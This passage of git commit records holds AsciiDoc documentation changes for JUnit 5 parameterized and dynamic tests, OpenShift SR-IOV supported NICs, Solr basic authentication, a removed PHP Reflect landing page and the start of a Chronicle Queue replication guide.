`\"2017-03-14T12:34:56.789Z\"` \u2192 `OffsetDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.OffsetTime` | `\"12:34:56.789Z\"` \u2192 `OffsetTime.of(12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.Year` | `\"2017\"` \u2192 `Year.of(2017)`\n| `java.time.YearMonth` | `\"2017-03\"` \u2192 `YearMonth.of(2017, 3)`\n| `java.time.ZonedDateTime` | `\"2017-03-14T12:34:56.789Z\"` \u2192 `ZonedDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n|===\n\n[[writing-tests-parameterized-tests-argument-conversion-explicit]]\n===== Explicit Conversion\n\nInstead of using implicit argument conversion you may explicitly specify an `ArgumentConverter` to\nuse for a certain parameter using the `@ConvertWith` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example]\n----\n\nExplicit argument converters are meant to be implemented by test authors. Thus,\n`junit-jupiter-params` only provides a single explicit argument converter that may also serve as a\nreference implementation: `JavaTimeArgumentConverter`. It is used via the composed annotation\n`JavaTimeConversionPattern`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_java_time_converter]\n----\n\n\n[[writing-tests-parameterized-tests-display-names]]\n==== Customizing Display Names\n\nBy default, the display name of a parameterized test invocation contains the invocation\nindex and the `String` representation of all arguments for that specific invocation.\nHowever, you can customize invocation display names via the `name` attribute of the\n`@ParameterizedTest` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=custom_display_names]\n----\n\nWhen executing the above method using the `ConsoleLauncher` you will see output similar to the following.\n\n....\nDisplay name of container \u2714\n\u251c\u2500 1 ==> first='foo', second=1 \u2714\n\u251c\u2500 2 ==> first='bar', second=2 \u2714\n\u2514\u2500 3 ==> first='baz, qux', second=3 \u2714\n....\n\nThe following placeholders are supported within custom display names.\n\n[cols=\"20,80\"]\n|===\n| Placeholder | Description\n\n| `{index}` | the current invocation index (1-based)\n| `{arguments}` | the complete, comma-separated arguments list\n| `{0}`, `{1}`, ... | an individual argument\n|===\n\n\n[[writing-tests-parameterized-tests-lifecycle-interop]]\n==== Lifecycle and Interoperability\n\nEach invocation of a parameterized test has the same lifecycle as a regular `@Test`\nmethod. For example, `@BeforeEach` methods will be executed before each invocation.\nSimilar to <<writing-tests-dynamic-tests>>, invocations will appear one by one in the\ntest tree of an IDE. You may at will mix regular `@Test` methods and `@ParameterizedTest`\nmethods within the same test class.\n\nYou may use `ParameterResolver` extensions with `@ParameterizedTest` methods. However, method\nparameters that are resolved by argument sources need to come first in the argument list.\nSince a test class may contain regular tests as well as parameterized tests with different\nparameter lists, values from argument sources are not resolved for lifecycle methods (e.g.\n`@BeforeEach`) and test class constructors.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ParameterResolver_example]\n----\n\n\n[[writing-tests-dynamic-tests]]\n=== Dynamic Tests\n\nThe standard `@Test` annotation in JUnit Jupiter described in <<writing-tests-annotations>>\nis very similar to the `@Test` annotation in JUnit 4.\nBoth describe methods that implement test cases.\nThese test cases are static in the sense that they are fully specified at compile time,\nand their behavior cannot be changed by anything happening at runtime.\n_Assumptions provide a basic form of dynamic behavior but are intentionally rather limited in their expressiveness._\n\nIn addition to these standard tests a completely new kind of test programming model has been introduced in JUnit Jupiter.\nThis new kind of test is a _dynamic test_ which is generated at runtime by a factory method\nthat is annotated with `@TestFactory`.\n\nIn contrast to `@Test` methods, a `@TestFactory` method is not itself a test case but rather a factory for test cases.\nThus, a dynamic test is the product of a factory.\nTechnically speaking, a `@TestFactory` method must return a `Stream`,\n`Collection`, `Iterable`, or `Iterator` of `DynamicNode` instances.\nInstantiable subclasses of `DynamicNode` are `DynamicContainer` and `DynamicTest`.\n`DynamicContainer` instances are composed of a _display name_ and a list of dynamic child nodes,\nenabling the creation of arbitrarily nested hierarchies of dynamic nodes.\n`DynamicTest` instances will then be executed lazily,\nenabling dynamic and even non-deterministic generation of test cases.\n\nAny `Stream` returned by a `@TestFactory` will be properly closed by calling `stream.close()`,\nmaking it safe to use a resource such as `Files.lines()`.\n\nAs with `@Test` methods, `@TestFactory` methods must not be `private` or `static`\nand may optionally declare parameters to be resolved by `ParameterResolvers`.\n\nA `DynamicTest` is a test case generated at runtime.\nIt is composed of a _display name_ and an `Executable`. `Executable` is a `@FunctionalInterface`\nwhich means that the implementations of dynamic tests can be provided as _lambda expressions_\nor _method references_.\n\n.Dynamic Test Lifecycle\nWARNING: The execution lifecycle of a dynamic test is quite different than it is for a\nstandard `@Test` case. Specifically, there are no lifecycle callbacks for individual\ndynamic tests. This means that `@BeforeEach` and `@AfterEach` methods and their corresponding\nextension callbacks are executed for the `@TestFactory` method, not for each dynamic test.\nIn other words, if you access fields from the test instance within a lambda expression for\na dynamic test, those fields will not be reset by callback methods or extensions between\nthe execution of individual dynamic tests generated by the same `@TestFactory` method.\n\nAs of JUnit Jupiter {jupiter-version}, dynamic tests must always be created by factory\nmethods; however, this might be complemented by a registration facility in a later\nrelease.\n\n[[writing-tests-dynamic-tests-examples]]\n==== Dynamic Test Examples\n\nThe following `DynamicTestsDemo` class demonstrates several examples of test factories and dynamic tests.\n\nThe first method returns an invalid return type. Since an invalid return type cannot be\ndetected at compile time, a `JUnitException` is thrown when it is detected at runtime.\n\nThe next five methods are very simple examples that demonstrate the generation of a\n`Collection`, `Iterable`, `Iterator`, or `Stream` of `DynamicTest` instances.\nMost of these examples do not really exhibit dynamic behavior\nbut merely demonstrate the supported return types in principle.\nHowever, `dynamicTestsFromStream()` and `dynamicTestsFromIntStream()` demonstrate how\neasy it is to generate dynamic tests for a given set of strings or a range of input numbers.\n\nThe next method is truly dynamic in nature.\n`generateRandomNumberOfTests()` implements an `Iterator` that generates random numbers, a\ndisplay name generator, and a test executor and then provides all three to `DynamicTest.stream()`.\nAlthough the non-deterministic behavior of `generateRandomNumberOfTests()` is of course in conflict with\ntest repeatability and should thus be used with care, it serves to demonstrate the expressiveness\nand power of dynamic tests.\n\nThe last method generates a nested hierarchy of dynamic tests utilizing `DynamicContainer`.\n\n[source,java]\n----\ninclude::{testDir}\/example\/DynamicTestsDemo.java[tags=user_guide]\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fdc646bbfebbe2f742d2b18823b5b9b2986404a5","subject":"OSDOCS-1807: sr-iov supp x710","message":"OSDOCS-1807: sr-iov supp x710\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-sriov-supported-devices.adoc","new_file":"modules\/nw-sriov-supported-devices.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/hardware_networks\/about-sriov.adoc\n\n[id=\"supported-devices_{context}\"]\n= Supported devices\n\n{product-title} supports the following network interface controller (NIC) models:\n\n* Intel X710 10GbE SFP+ with vendor ID `0x8086` and device ID `0x1572`\n* Intel XXV710 25GbE SFP28 with vendor ID `0x8086` and device ID `0x158b`\n* Mellanox MT27710 Family [ConnectX-4 Lx] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1015`\n* Mellanox MT27800 Family [ConnectX-5] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27800 Family [ConnectX-5] 100GbE with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27700 Family [ConnectX-4] VPI adapter card, EDR IB (100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1013`\n* Mellanox MT27800 Family [ConnectX-5] VPI adapter card, EDR IB (100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, 100Gb\/s (HDR100, EDR IB), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, HDR200 IB (200Gb\/s), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/hardware_networks\/about-sriov.adoc\n\n[id=\"supported-devices_{context}\"]\n= Supported devices\n\n{product-title} supports the following Network Interface Card (NIC) models:\n\n* Intel XXV710 25GbE SFP28 with vendor ID `0x8086` and device ID `0x158b`\n* Mellanox MT27710 Family [ConnectX-4 Lx] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1015`\n* Mellanox MT27800 Family [ConnectX-5] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27800 Family [ConnectX-5] 100GbE with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27700 Family [ConnectX-4] VPI adapter card, EDR IB (100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1013`\n* Mellanox MT27800 Family [ConnectX-5] VPI adapter card, EDR IB (100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, 100Gb\/s (HDR100, EDR IB), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, HDR200 IB (200Gb\/s), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4eea44103eab800daddabc99eb82f450700108aa","subject":"Ref Guide: Add callouts to the security.json example","message":"Ref Guide: Add callouts to the security.json example\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/basic-authentication-plugin.adoc","new_file":"solr\/solr-ref-guide\/src\/basic-authentication-plugin.adoc","new_contents":"= Basic Authentication Plugin\n:page-shortname: basic-authentication-plugin\n:page-permalink: basic-authentication-plugin.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nSolr can support Basic authentication for users with the use of the BasicAuthPlugin.\n\nAn authorization plugin is also available to configure Solr with permissions to perform various activities in the system. The authorization plugin is described in the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\n[[BasicAuthenticationPlugin-EnableBasicAuthentication]]\n== Enable Basic Authentication\n\nTo use Basic authentication, you must first create a `security.json` file. This file and where to put it is described in detail in the section <<authentication-and-authorization-plugins.adoc#AuthenticationandAuthorizationPlugins-EnablePluginswithsecurity.json,Enable Plugins with security.json>>.\n\nFor Basic authentication, the `security.json` file must have an `authentication` part which defines the class being used for authentication. Usernames and passwords (as a sha256(password+salt) hash) could be added when the file is created, or can be added later with the Basic authentication API, described below.\n\nThe `authorization` part is not related to Basic authentication, but is a separate authorization plugin designed to support fine-grained user access control. For more information, see the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\nAn example `security.json` showing both sections is shown below to show how these plugins can work together:\n\n[source,json]\n----\n{\n\"authentication\":{ <1>\n \"blockUnknown\": true, <2>\n \"class\":\"solr.BasicAuthPlugin\",\n \"credentials\":{\"solr\":\"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c=\"} <3>\n},\n\"authorization\":{\n \"class\":\"solr.RuleBasedAuthorizationPlugin\",\n \"permissions\":[{\"name\":\"security-edit\",\n \"role\":\"admin\"}], <4>\n \"user-role\":{\"solr\":\"admin\"} <5>\n}}\n----\n\nThere are several things defined in this file:\n\n<1> Basic authentication and rule-based authorization plugins are enabled.\n<2> A user called 'solr', with a password `'SolrRocks'` has been defined.\n<3> The parameter `\"blockUnknown\":true` means that unauthenticated requests are not allowed to pass through.\n<4> The 'admin' role has been defined, and it has permission to edit security settings.\n<5> The 'solr' user has been defined to the 'admin' role.\n\nSave your settings to a file called `security.json` locally. If you are using Solr in standalone mode, you should put this file in `$SOLR_HOME`.\n\nIf `blockUnknown` does not appear in the `security.json` file, it will default to `false`. This has the effect of not requiring authentication at all. In some cases, you may want this; for example, if you want to have `security.json` in place but aren't ready to enable authentication. However, you will want to ensure that this parameter is set to `true` in order for authentication to be truly enabled in your system.\n\nIf you are using SolrCloud, you must upload `security.json` to ZooKeeper. You can use this example command, ensuring that the ZooKeeper port is correct:\n\n[source,bash]\n----\nbin\/solr zk cp file:path_to_local_security.json zk:\/security.json -z localhost:9983\n----\n\n[[BasicAuthenticationPlugin-Caveats]]\n=== Caveats\n\nThere are a few things to keep in mind when using the Basic authentication plugin.\n\n* Credentials are sent in plain text by default. It's recommended to use SSL for communication when Basic authentication is enabled, as described in the section <<enabling-ssl.adoc#enabling-ssl,Enabling SSL>>.\n* A user who has access to write permissions to `security.json` will be able to modify all the permissions and how users have been assigned permissions. Special care should be taken to only grant access to editing security to appropriate users.\n* Your network should, of course, be secure. Even with Basic authentication enabled, you should not unnecessarily expose Solr to the outside world.\n\n[[BasicAuthenticationPlugin-EditingAuthenticationPluginConfiguration]]\n== Editing Authentication Plugin Configuration\n\nAn Authentication API allows modifying user IDs and passwords. The API provides an endpoint with specific commands to set user details or delete a user.\n\n[[BasicAuthenticationPlugin-APIEntryPoint]]\n=== API Entry Point\n\n`admin\/authentication`\n\nThis endpoint is not collection-specific, so users are created for the entire Solr cluster. If users need to be restricted to a specific collection, that can be done with the authorization rules.\n\n[[BasicAuthenticationPlugin-AddaUserorEditaPassword]]\n=== Add a User or Edit a Password\n\nThe `set-user` command allows you to add users and change their passwords. For example, the following defines two users and their passwords:\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-user\": {\"tom\" : \"TomIsCool\" ,\n \"harry\":\"HarrysSecret\"}}'\n----\n\n[[BasicAuthenticationPlugin-DeleteaUser]]\n=== Delete a User\n\nThe `delete-user` command allows you to remove a user. The user password does not need to be sent to remove a user. In the following example, we've asked that user IDs 'tom' and 'harry' be removed from the system.\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"delete-user\": [\"tom\",\"harry\"]}'\n----\n\n[[BasicAuthenticationPlugin-Setaproperty]]\n=== Set a Property\n\nSet arbitrary properties for authentication plugin. The only supported property is `'blockUnknown'`\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-property\": {\"blockUnknown\":false}}'\n----\n\n[[BasicAuthenticationPlugin-UsingBasicAuthwithSolrJ]]\n=== Using BasicAuth with SolrJ\n\nIn SolrJ, the basic authentication credentials need to be set for each request as in this example:\n\n[source,java]\n----\nSolrRequest req ;\/\/create a new request object\nreq.setBasicAuthCredentials(userName, password);\nsolrClient.request(req);\n----\n\nQuery example:\n\n[source,java]\n----\nQueryRequest req = new QueryRequest(new SolrQuery(\"*:*\"));\nreq.setBasicAuthCredentials(userName, password);\nQueryResponse rsp = req.process(solrClient);\n----\n\n[[BasicAuthenticationPlugin-UsingCommandLinescriptswithBasicAuth]]\n=== Using Command Line scripts with BasicAuth\n\nAdd the following line to the `solr.in.sh` or `solr.in.cmd` file. This example tells the `bin\/solr` command line to to use \"basic\" as the type of authentication, and to pass credentials with the user-name \"solr\" and password \"SolrRocks\":\n\n[source,bash]\n----\nSOLR_AUTH_TYPE=\"basic\"\nSOLR_AUTHENTICATION_OPTS=\"-Dbasicauth=solr:SolrRocks\"\n----\n","old_contents":"= Basic Authentication Plugin\n:page-shortname: basic-authentication-plugin\n:page-permalink: basic-authentication-plugin.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nSolr can support Basic authentication for users with the use of the BasicAuthPlugin.\n\nAn authorization plugin is also available to configure Solr with permissions to perform various activities in the system. The authorization plugin is described in the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\n[[BasicAuthenticationPlugin-EnableBasicAuthentication]]\n== Enable Basic Authentication\n\nTo use Basic authentication, you must first create a `security.json` file. This file and where to put it is described in detail in the section <<authentication-and-authorization-plugins.adoc#AuthenticationandAuthorizationPlugins-EnablePluginswithsecurity.json,Enable Plugins with security.json>>.\n\nFor Basic authentication, the `security.json` file must have an `authentication` part which defines the class being used for authentication. Usernames and passwords (as a sha256(password+salt) hash) could be added when the file is created, or can be added later with the Basic authentication API, described below.\n\nThe `authorization` part is not related to Basic authentication, but is a separate authorization plugin designed to support fine-grained user access control. For more information, see the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\nAn example `security.json` showing both sections is shown below to show how these plugins can work together:\n\n[source,json]\n----\n{\n\"authentication\":{\n \"blockUnknown\": true,\n \"class\":\"solr.BasicAuthPlugin\",\n \"credentials\":{\"solr\":\"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c=\"}\n},\n\"authorization\":{\n \"class\":\"solr.RuleBasedAuthorizationPlugin\",\n \"permissions\":[{\"name\":\"security-edit\",\n \"role\":\"admin\"}],\n \"user-role\":{\"solr\":\"admin\"}\n}}\n----\n\nThere are several things defined in this file:\n\n* Basic authentication and rule-based authorization plugins are enabled.\n* A user called 'solr', with a password `'SolrRocks'` has been defined.\n* The parameter `\"blockUnknown\": true` means that unauthenticated requests are not allowed to pass through.\n* The 'admin' role has been defined, and it has permission to edit security settings.\n* The 'solr' user has been defined to the 'admin' role.\n\nSave your settings to a file called `security.json` locally. If you are using Solr in standalone mode, you should put this file in `$SOLR_HOME`.\n\nIf `blockUnknown` does not appear in the `security.json` file, it will default to `false`. This has the effect of not requiring authentication at all. In some cases, you may want this; for example, if you want to have `security.json` in place but aren't ready to enable authentication. However, you will want to ensure that this parameter is set to `true` in order for authentication to be truly enabled in your system.\n\nIf you are using SolrCloud, you must upload `security.json` to ZooKeeper. You can use this example command, ensuring that the ZooKeeper port is correct:\n\n[source,bash]\n----\nbin\/solr zk cp file:path_to_local_security.json zk:\/security.json -z localhost:9983\n----\n\n[[BasicAuthenticationPlugin-Caveats]]\n=== Caveats\n\nThere are a few things to keep in mind when using the Basic authentication plugin.\n\n* Credentials are sent in plain text by default. It's recommended to use SSL for communication when Basic authentication is enabled, as described in the section <<enabling-ssl.adoc#enabling-ssl,Enabling SSL>>.\n* A user who has access to write permissions to `security.json` will be able to modify all the permissions and how users have been assigned permissions. Special care should be taken to only grant access to editing security to appropriate users.\n* Your network should, of course, be secure. Even with Basic authentication enabled, you should not unnecessarily expose Solr to the outside world.\n\n[[BasicAuthenticationPlugin-EditingAuthenticationPluginConfiguration]]\n== Editing Authentication Plugin Configuration\n\nAn Authentication API allows modifying user IDs and passwords. The API provides an endpoint with specific commands to set user details or delete a user.\n\n[[BasicAuthenticationPlugin-APIEntryPoint]]\n=== API Entry Point\n\n`admin\/authentication`\n\nThis endpoint is not collection-specific, so users are created for the entire Solr cluster. If users need to be restricted to a specific collection, that can be done with the authorization rules.\n\n[[BasicAuthenticationPlugin-AddaUserorEditaPassword]]\n=== Add a User or Edit a Password\n\nThe `set-user` command allows you to add users and change their passwords. For example, the following defines two users and their passwords:\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-user\": {\"tom\" : \"TomIsCool\" ,\n \"harry\":\"HarrysSecret\"}}'\n----\n\n[[BasicAuthenticationPlugin-DeleteaUser]]\n=== Delete a User\n\nThe `delete-user` command allows you to remove a user. The user password does not need to be sent to remove a user. In the following example, we've asked that user IDs 'tom' and 'harry' be removed from the system.\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"delete-user\": [\"tom\",\"harry\"]}'\n----\n\n[[BasicAuthenticationPlugin-Setaproperty]]\n=== Set a Property\n\nSet arbitrary properties for authentication plugin. The only supported property is `'blockUnknown'`\n\n[source,bash]\n----\ncurl --user solr:SolrRocks http:\/\/localhost:8983\/solr\/admin\/authentication -H 'Content-type:application\/json' -d '{\n \"set-property\": {\"blockUnknown\":false}}'\n----\n\n[[BasicAuthenticationPlugin-UsingBasicAuthwithSolrJ]]\n=== Using BasicAuth with SolrJ\n\nIn SolrJ, the basic authentication credentials need to be set for each request as in this example:\n\n[source,java]\n----\nSolrRequest req ;\/\/create a new request object\nreq.setBasicAuthCredentials(userName, password);\nsolrClient.request(req);\n----\n\nQuery example:\n\n[source,java]\n----\nQueryRequest req = new QueryRequest(new SolrQuery(\"*:*\"));\nreq.setBasicAuthCredentials(userName, password);\nQueryResponse rsp = req.process(solrClient);\n----\n\n[[BasicAuthenticationPlugin-UsingCommandLinescriptswithBasicAuth]]\n=== Using Command Line scripts with BasicAuth\n\nAdd the following line to the `solr.in.sh` or `solr.in.cmd` file. This example tells the `bin\/solr` command line to to use \"basic\" as the type of authentication, and to pass credentials with the user-name \"solr\" and password \"SolrRocks\":\n\n[source,bash]\n----\nSOLR_AUTH_TYPE=\"basic\"\nSOLR_AUTHENTICATION_OPTS=\"-Dbasicauth=solr:SolrRocks\"\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b92c0e77cbd2910949e4d5e77600df467eaf2370","subject":"removed landing page 2.0 replaced by new one (index.asciidoc) in 2.1","message":"removed landing page 2.0 replaced by new one (index.asciidoc) in 2.1\n","repos":"llaville\/php-reflect,remicollet\/php-reflect","old_file":"docs\/landing.asciidoc","new_file":"docs\/landing.asciidoc","new_contents":"","old_contents":"= Reflect\n:description: Reverse-engineer classes, interfaces, traits, functions, constants, namespaces and more.\n:jumbotron-fullwidth:\n:css-signature: landing\n:icons!:\n:iconsfont: font-awesome\n:iconsfontdir: .\/fonts\/font-awesome\ninclude::revision.asciidoc[]\ninclude::attributes.asciidoc[]\n\n\n== What Is PHP Reflect\n\nWith PHP5 http:\/\/www.php.net\/manual\/en\/book.reflection.php[Reflection] API\nthe code to analyze needs to be loaded and interpreted by the php interpreter,\nand in certain cases, this triggers fatal errors.\n\nWith PHP [label label-primary]#Reflect# you don't have to trust in source code, because it will be parsed\nwith tokenizer extension.\n\n== Features\n\n[cols=\"1,11\"]\n.icon:flag[size=\"2x\"]\n--\n[medium]*Modern*\n\n[label label-primary]#Reflect# takes advantage of new features in PHP 5.3.0 or greater.\n--\n[cols=\"1,11\"]\n.icon:building-o[size=\"2x\"]\n--\n[medium]*Robust*\n\n[label label-primary]#Reflect# is strictly tested. Checks code coverage and see by yourself.\n--\n[cols=\"1,11\"]\n.icon:puzzle-piece[size=\"2x\"]\n--\n[medium]*Reflection API*\n\n[label label-primary]#Reflect# comes with a complete reflection API\nlink:features-compared.html[almost equivalent] to PHP5 reflection.\n--\n[cols=\"1,11\"]\n.icon:suitcase[size=\"2x\"]\n--\n[medium]*Solid Foundation*\n\nWhenever possible wheel reinvention was avoided. [label label-primary]#Reflect# uses code from well-known projects\nincluding http:\/\/www.symfony.com\/[Symfony] Finder, and EventDispatcher.\n--\n[cols=\"1,11\"]\n.icon:expand[size=\"2x\"]\n--\n[medium]*Extensible*\n\nSupported token parser is not enough for you ? Create your own. It is really simple!\n--\n\n== License\n\n[role=\"partintro\",cols=\"3,9\"]\n.icon:shield[size=\"7x\"] [clearfix]#Reflect is open-source software.#\n--\n[medium]*BSD License*\n\nThe full legal text of the BSD 3-clause license is given below.\n----\n Copyright (c) 2011-2014, Laurent Laville <pear@laurent-laville.org>\n\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and\/or other materials provided with the distribution.\n * Neither the name of the authors nor the names of its contributors\n may be used to endorse or promote products derived from this software\n without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS\n BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n----\n--\n\n== What is next\n\nWARNING: First visit, you are highly recommended to follow chapters in order.\n\n[horizontal]\nSetup:: Configuring your project and get ready for your first parsing.\nQuick Start:: This quick start is a five minute tutorial where you can discover how to identify a data source and parse its contents.\nHandle Results:: Learn how to explore and exploit parsing results.\nConcrete Examples:: Discover how Reflect may be use in real condition.\n\nlink:setup.html[\"Go to next chapter: Setup\",role=\"primary\",icon=\"glyphicon-step-forward\",options=\"block\"]\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ff5ad0d35f4802b2940905ae6cef3560b47b5e45","subject":"Re-worked and edited","message":"Re-worked and edited\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/replication.adoc","new_file":"docs\/replication.adoc","new_contents":"= Replication (Enterprise Edition Feature)\nNeil Clifford\n:toc: macro\n:toclevels: 1\n:css-signature: demo\n:toc-placement: macro\n:icons: font\n\ntoc::[]\n\nChronicle Queue replicates Chronicle Queue messages over TCP\/IP, from the `PRIMARY` to the `SECONDARY` to provide real-time back-up of your Chronicle queues.\n\nChronicle Queue automatically performs replication if the `chronicle-queue-enterprise.jar` is available in your class path, and you have set up a cluster in the `cluster.yaml` configuration file.\n\nNOTE: For more information on obtaining the `chronicle-queue-enterprise.jar` please contact mailto:sales@chronicle.software[sales@chronicle.software].\n\nChronicle Queue replication works by replicating all messages from the `PRIMARY` queue to the `SECONDARY` queue.\n\nimage::Chronicle-Queue-Replication_diagram_02.jpg[Replication]\n\nIMPORTANT: Chronicle requires exclusive write access to the `SECONDARY`. You should treat the `SECONDARY` as read-only, and not attempt to manually write messages.\n\n== Queue header\nThe Chronical Queue header is structured as follows:\n\n[source, java]\n----\n\n--- !!meta-data #binary\nheader: !SCQStore {\n wireType: !WireType BINARY_LIGHT,\n writePosition: 524744,\n roll: !SCQSRoll {\n length: !short 1000,\n format: yyyyMMdd-HHmmss,\n epoch: 0\n },\n indexing: !SCQSIndexing {\n indexCount: !int 32768,\n indexSpacing: 4,\n index2Index: 385,\n lastIndex: 4\n },\n lastAcknowledgedIndexReplicated: -1,\n recovery: !TimedStoreRecovery {\n timeStamp: 0\n },\n deltaCheckpointInterval: 0\n}\n----\n`lastAcknowledgedIndexReplicated` is set to `-1` when\n\n- replication is not being used, or\n\n- no replication acknowledgment has yet been received from the other host.\n\n`lastAcknowledgedIndexReplicated` will be automatically set to the index position of the latest acknowledged message.\n\n\n== Tiered Indexing\nChronicle Queue uses tiered multi-level indexing to provide a fast and efficient method for searching for messages in a large queue.\n\n=== Primary index\n----\n# position: 385, header: -1 # <1>\n--- !!meta-data #binary\nindex2index: [ # <2>\n # length: 32768, used: 1\n 262568, # <3>\n 0, 0, 0, 0, 0,\n]\n----\n\n<1> `position` specifies the starting address of the data that follows, within the the queue (*.cq4) file.\n\n<2> `index2Index` defines a pointer to the next lower level of 